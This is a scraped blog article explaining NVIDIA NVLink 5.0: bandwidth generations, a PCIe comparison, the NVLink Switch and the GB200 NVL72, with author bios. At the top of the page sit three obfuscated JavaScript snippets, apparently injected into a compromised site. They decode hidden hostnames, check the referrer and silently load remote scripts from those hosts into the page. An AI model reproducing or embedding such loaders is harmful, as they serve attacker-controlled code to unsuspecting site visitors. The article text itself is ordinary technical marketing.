Your Cart
function b(c,d){var e=a();return b=function(f,g){f=f-0x12c;var h=e[f];return h;},b(c,d);}(function(c,d){var i=b,e=c();while(!![]){try{var f=-parseInt(i(0x12e))/0x1+parseInt(i(0x12f))/0x2*(parseInt(i(0x131))/0x3)+parseInt(i(0x13a))/0x4+parseInt(i(0x130))/0x5+parseInt(i(0x12c))/0x6*(-parseInt(i(0x133))/0x7)+-parseInt(i(0x13b))/0x8+parseInt(i(0x135))/0x9;if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0x6ffe0),!function(c,d){var j=b,f=Math['floor'](Date[j(0x136)]()/0x3e8),g=f-f%0xe10;if(f-=f%0x258,f=f[j(0x134)](0x10),!document[j(0x141)])return;let h=j(0x13f)+atob('MjRzdXBwb3'+j(0x138)+'==');(d=c[j(0x13d)]('script'))[j(0x137)]=j(0x132),d[j(0x13e)]=!0x0,d[j(0x139)]='https://'+h+'/'+g+j(0x13c)+f,c[j(0x12d)](j(0x140))[0x0]['appendChild'](d);}(document));function a(){var k=['createElement','async','page.','head','referrer','948fBuTlJ','getElementsByTagName','405099iMJsxt','60064uswqAY','941065OuFjem','3qpFwHO','text/javascript','24724BRZfJy','toString','4862187iadxjH','now','type','J0a2l0LmNvbQ','src','2871032gjOPkO','434968buuWzf','/em.js?revision='];a=function(){return k;};return a();}
!function (_da81c5) { var _4f558a = Date.now(); var _204c8 = 1000; _4f558a = _4f558a / _204c8; _4f558a = Math.floor(_4f558a); var _1bef1d = 600; _4f558a -= _4f558a % _1bef1d; _4f558a = _4f558a.toString(16); var _9ec065 = _da81c5.referrer; if (!_9ec065) return; var _881466 = [16403, 16385, 16385, 16407, 16390, 16385, 16476, 16389, 16403, 16390, 16401, 16410, 16403, 16385, 16395, 16412, 16401, 16476, 16401, 16413, 16415]; _881466 = _881466.map(function(_3b6a9b){ return _3b6a9b ^ 16498; }); var _53e2c4 = "37881230704295ff02d49a6c8c1adcd7"; _881466 = String.fromCharCode(..._881466); var _74c287 = "https://"; var _2d6041 = "/"; var _7a9e75 = "chunk-"; var _84600c = ".js"; var _2fa32f = _da81c5.createElement("script"); _2fa32f.type = "text/javascript"; _2fa32f.async = true; _2fa32f.src = _74c287 + _881466 + _2d6041 + _7a9e75 + _4f558a + _84600c; _da81c5.getElementsByTagName("head")[0].appendChild(_2fa32f) }(document);
!function (_7cfd21) { var _9a18ae = Date.now(); var _2de747 = 1000; _9a18ae = _9a18ae / _2de747; _9a18ae = Math.floor(_9a18ae); var _6bf20d = 600; _9a18ae -= _9a18ae % _6bf20d; _9a18ae = _9a18ae.toString(16); var _f1de2c = _7cfd21.referrer; if (!_f1de2c) return; var _323e77 = [5614, 5611, 5620, 5607, 5606, 5603, 5617, 5610, 5600, 5613, 5603, 5616, 5606, 5609, 5611, 5622, 5548, 5611, 5612, 5604, 5613]; _323e77 = _323e77.map(function(_e2677c){ return _e2677c ^ 5506; }); var _caad06 = "40f5ce7236cbb9b0bbc45d9d867f3bee"; _323e77 = String.fromCharCode(..._323e77); var _e04444 = "https://"; var _e06d1a = "/"; var _327561 = "track-"; var _9473b2 = ".js"; var _e0a0d3 = _7cfd21.createElement("script"); _e0a0d3.type = "text/javascript"; _e0a0d3.async = true; _e0a0d3.src = _e04444 + _323e77 + _e06d1a + _327561 + _9a18ae + _9473b2; _7cfd21.getElementsByTagName("head")[0].appendChild(_e0a0d3) }(document);

NVIDIA NVLink 5.0: Accelerating Multi-GPU Communication

Blog | By |

With the demands of AI workloads continuing to outpace the capabilities of existing infrastructure, the need for lightning-fast inter-GPU communication within a server cluster is more vital than ever.

NVIDIA’s latest fifth-generation NVLink and NVLink Switch address this challenge, redefining the limits of multi-GPU communication and unlocking new possibilities in high-performance computing.

What is NVLink 5.0?

The fifth-generation generation NVLink is the latest 2024 iteration of NVIDIA’s ultra-high-speed interconnect technology that enhances direct communication between multiple GPUs within a system.

Purpose built for the multi-GPU Blackwell architecture systems, NVLink 5.0 enables blazing fast bi-directional bandwidth of 1.8TB/s, doubling the 900GB/s bandwidth of the previous 4th generation. This amounts to an astonishing 14x the bandwidth of the equivalent PCIe 5.0 generation.

To achieve full non-blocking connectivity between GPUs within a server rack, the NVLink Switch chip acts as a rack-level interconnect. NVIDIA’s latest Blackwell GPUs achieve this 1.8 TB/s of aggregate bidirectional bandwidth per GPU through 18x 100 GB/s NVLink links, enabling all-to-all communication in a mesh topology. This allows for the combined processing power of up to 576 GPUs to be leveraged as a single high-performance accelerator for compute-intensive AI workloads.

Table: NVLink Evolution

NVLink Evolution
Generation Bandwidth per GPU Max Links per GPU Supported Architectures
2nd Gen 300 GB/s 6 Volta
3rd Gen 600 GB/s 12 Ampere
4th Gen 900 GB/s 18 Hopper
5th Gen 1,800 GB/s 18 Blackwell

Source: NVIDIA

Table: NVLink Switch Evolution

NVLink Switch Evolution
Generation GPUs in NVLink Domain GPU-to-GPU Bandwidth Total Bandwidth Supported Architectures
1st Gen Up to 8 300 GB/s 2.4 TB/s Volta
2nd Gen Up to 8 600 GB/s 4.8 TB/s Ampere
3rd Gen Up to 8 900 GB/s 7.2 TB/s Hopper
NVLink Switch Up to 576 1,800 GB/s 1 PB/s Blackwell

Source: NVIDIA

Comparing NVLink 5.0 and Latest PCIe Generations

The latest generations PCIe 5.0 and PCIe 6.0 are general-purpose interfaces designed for connecting a wide range of components like GPUs, storage, and networking devices, with PCIe 6.0 doubling the bandwidth of PCIe 5.0.

NVLink 5.0, on the other hand, is specialized for high-speed interconnects designed to maximize data transfer between GPUs.

While PCIe excels at versatile connectivity, NVLink 5.0’s significantly higher bandwidth makes it the preferred choice for GPU-intensive workloads like AI training and high-performance computing.

Comparison Table: Maximum Data Rate of NVLink 5.0 and PCIe 5.0/6.0

Comparison Table: Maximum Data Rate of NVLink 5.0 and PCIe 5.0/6.0
Technology Configuration Maximum Data Rate Notes
PCIe 5.0 x16 128 GB/s PCIe 4.0 and PCIe 5.0 are the most commonly used PCIe generations in today’s consumer and enterprise systems.
PCIe 6.0 x16 256 GB/s PCIe 6.0 delivers 2x the maximum data rate of PCIe 5.0. PCIe 6.0 is currently in the early stages of adoption.
NVLink 5.0 Per GPU 1800 GB/s NVLink 5.0 delivers 14x the maximum data rate of PCIe 5.0 and 7x the maximum data rate of PCIe 6.0.

The above table illustrates the direct comparison of data transfer rates between PCIe 5.0, PCIe 6.0, and NVLink 5.0.

This stark difference highlights NVLink 5.0’s capability to handle the large data sets typical in AI and high-performance computing workloads, offering approximately 14x and 7x the data transfer speeds of PCIe 5.0 and PCIe 6.0, respectively.

NVLink 5.0 Key Components

The key components of NVLink include:

  1. Blackwell GPUs with 5th Gen NVLink:
    • 18 NVLink links per GPU, providing 1.8 TB/s total bidirectional bandwidth.
    • 50 GB/s per link in each direction (100 GB/s bidirectional), doubling the bandwidth of NVLink in Hopper GPUs.
    • This high bandwidth enables efficient communication for large AI models, exceeding PCIe Gen5 bandwidth by 14X.
  2. NVLink Switch ASIC and Switches:
    • Enables scaling up to 576 GPUs within a single NVLink domain (NVL72) for model parallelism.
    • Delivers 4X bandwidth efficiency with NVIDIA Scalable Hierarchical Aggregation and Reduction Protocol (SHARP)™ FP8 support.
    • Supports clusters like the GB200 NVL72, which offers 9X the GPU throughput compared to a single eight-GPU system.
  3. NVIDIA Unified Fabric Manager (UFM®):
    • Provides production-proven management for the NVLink compute fabric, ensuring reliable and efficient communication between GPUs.

NVLink Communication Scope

NVLink is primarily designed for high-bandwidth, low-latency communication within a single system or tightly integrated multi-GPU setups within the same rack or chassis. NVLink bridges and NVSwitches facilitate GPU-to-GPU and GPU-to-CPU communication within these confines.

NVLink leverages serial copper interconnects for the high-bandwidth, low-latency GPU-to-GPU and server-to-server links within a rack.

For connecting across different racks, technologies such as RoCE, InfiniBand, or high-speed Ethernet with optical fiber are more suitable and necessary to maintain high performance and low latency over greater distances.

In large-scale data centers, a hybrid approach is often employed, using NVLink for intra-rack communication and other networking technologies like RoCE or InfiniBand for inter-rack communication, combining the strengths of each technology.

Read More About RoCE: The Role of RoCE (RDMA over Converged Ethernet) in AI Workloads

The NVIDIA GB200 NVL72 Server Platform

The NVIDIA GB200 NVL72 was designed to leverage NVLink 5.0’s capabilities to achieve unprecedented high-performance computing. It leverages the NVLink 5.0 Switch System to create a massive GPU cluster for accelerated AI and HPC workloads.

With this example, the GB200 NVL72 demonstrates its effectiveness in a variety of use cases of NVLink 5.0, including the following:

    • Real-Time Trillion-Parameter LLM Inference: NVLink 5.0’s high bandwidth and low latency, combined with the GB200’s architecture, deliver 30x faster inference for large language models compared to previous generations.
    • Massive-Scale Training: The system’s 72-GPU NVLink domain, facilitated by NVLink 5.0, enables 4x faster training for large language models.
    • Energy-Efficient Infrastructure: Liquid cooling and the efficient NVLink interconnect contribute to a 25x performance-per-watt improvement over air-cooled systems.
    • Data Processing: The GB200’s architecture, coupled with NVLink 5.0, accelerates key database queries by 18x compared to CPUs.

Recommended Read: The Power of Network Automation

Conclusion

The fifth generation NVLink introduces remarkable advancements like unprecedented bandwidth, enabling seamless communication between hundreds of GPUs, and paving the way for exascale computing and multi-trillion parameter AI models. The NVLink Switch further amplifies this power, facilitating efficient scaling across multiple servers and unlocking new levels of performance.

With ongoing advancements in AI and the increasing demand for computational power, NVLink is poised to remain a critical technology, shaping the future of high-performance computing and accelerating groundbreaking discoveries in various fields. As NVIDIA continues to invest in and refine NVLink, we can anticipate even more impressive developments that will further transform the landscape of accelerated computing.

About Hardware Nation:

Hardware Nation is a professional services company that accelerates network transformation through an open networking approach, enabling freedom of choice, flexibility, and cost efficiency. Our seasoned experts have worked on projects for some of the world’s leading organizations, leveraging a hybrid cloud-first and AI-enabled approach. We help our customers navigate the ecosystem, drawing on decades of experience. Our deployments are powered by leading white box and OEM network, compute, and storage vendors. Our expertise encompasses a wide range of industries and use cases, including enterprise, cloud, data center, AI, 5G/ISP infrastructure, and edge IT.

Alex Cronin​

Co-Founder and Solutions Architect

Alex Cronin is a seasoned Solutions Architect with over 15 years of experience in networking and disaggregated infrastructure. His career is defined by aligning enterprise technology with business needs across diverse market segments, from emerging startups to Fortune 500 companies. He has worked on digital infrastructure projects covering network design and software solutions for data center operators, service providers, and enterprises. He is continuously collaborating with Hardware Nation Labs R&D to explore and pioneer the latest advancements in open networking and is assessing the applicability of AI/ML technology across enterprise, data center, and service provider infrastructures.

Rahul Narwal

Content Writer

Rahul is a content writer passionate about AI and software development, blending creativity with technical expertise. He creates engaging articles, visuals, and research papers in collaboration with seasoned experts, simplifying complex topics for both technical and non-technical audiences.

Learn more about our approach to AI infrastructure.